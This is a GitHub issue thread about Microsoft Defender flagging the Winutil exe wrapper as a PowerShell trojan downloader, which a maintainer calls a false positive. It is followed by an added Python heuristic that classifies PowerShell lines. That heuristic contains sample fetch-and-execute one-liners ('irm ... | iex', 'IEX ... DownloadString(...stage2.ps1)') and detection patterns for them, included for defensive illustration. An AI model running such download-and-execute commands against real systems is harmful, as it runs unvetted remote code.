Exe wrapper from christitustech.com is flagged by MS Defender for TrojanDownloader:PowerShell/Ploprolo.gen!A

Open kilroywashere17 opened this issue 1 year ago • 4 comments

Hello,

I downloaded the exe wrapper from christitustech.com to show my support for the utility. Upon downloading the zip, MS Defender flagged the file for the following reason: "TrojanDownloader:PowerShell/Ploprolo.gen!A". I'm not knowledgeable enough to understand whether this is a false flag or not, but it's not the most confidence-inspiring when downloading software you just paid to show your support for.

Found the same issue referenced here: https://github.com/ChrisTitusTech/website/issues/84 by wolferrine on Jan 21.

Microsoft provided the additional documentation/help link here: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanDownloader%3APowerShell%2FPloprolo.gen!A&threatid=2147719730

Would be good to hear back or get some official response to this for less experienced users of the utility.

Thanks!

kilroywashere17, Jul 03 '24 00:07

Attached photo to show what's popping up.

kilroywashere17, Jul 03 '24 00:07

I also ran the zip through virustotal.com and got the following results if that's of any use: [image]

kilroywashere17, Jul 03 '24 00:07

@ChrisTitusTech

Real-MullaC, Jul 04 '24 07:07

This issue was marked as stale because it has been inactive for 7 days.

github-actions[bot], Jul 12 '24 00:07

Winutil gets flagged by some security vendors as malware off and on because it contains scripts that modify Windows, and also because of the nature of downloading, invoking and running the script in memory, which looks similar to some multi-stage malware attacks. This is a false positive. /close

Marterich, Jul 16 '24 19:07
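
The download-invoke-run-in-memory pattern described in the last comment, as an added example that is not part of the original thread and is not Microsoft Defender's detection logic: a simplified heuristic that labels PowerShell lines by shape. The sample lines, URLs and label names are constructed for illustration.

```python
import re

# Simplified behavioural heuristic (assumption: NOT Defender's real signature).
# It looks only at the *shape* of a command, which is why a legitimate
# launcher and a malicious stager can receive the same label.
FETCH = re.compile(
    r"\b(?:irm|iwr|curl|wget|Invoke-RestMethod|Invoke-WebRequest)\b"
    r"|\.DownloadString\s*\(|\.DownloadData\s*\(",
    re.IGNORECASE,
)
EXEC = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.IGNORECASE)
TO_DISK = re.compile(r"-OutFile\b|\.DownloadFile\s*\(", re.IGNORECASE)


def classify(line: str) -> str:
    """Label one PowerShell line by its download/execute shape."""
    fetch = bool(FETCH.search(line))
    execute = bool(EXEC.search(line))
    to_disk = bool(TO_DISK.search(line))
    if fetch and execute and not to_disk:
        # Remote content is evaluated without ever being written to disk.
        return "download-exec-in-memory"
    if fetch and to_disk:
        return "download-to-disk"
    if execute:
        return "exec-only"
    return "none"


# Constructed sample lines (example.com is a placeholder host).
SAMPLES = [
    'irm "https://example.com/tool.ps1" | iex',
    "IEX (New-Object Net.WebClient).DownloadString('https://example.com/stage2.ps1')",
    "Invoke-WebRequest https://example.com/tool.zip -OutFile tool.zip",
    "Invoke-Expression $localCommand",
    r"Get-ChildItem C:\Temp | Sort-Object Length",
]


def scan(lines):
    """Return (label, line) pairs for every line that matched something."""
    return [(classify(l), l) for l in lines if classify(l) != "none"]


if __name__ == "__main__":
    for label, line in scan(SAMPLES):
        print(f"{label:26} {line}")
```

The first two samples get the same label even though nothing in the text says which one is benign, so a shape-based match alone cannot settle whether a detection is a false positive.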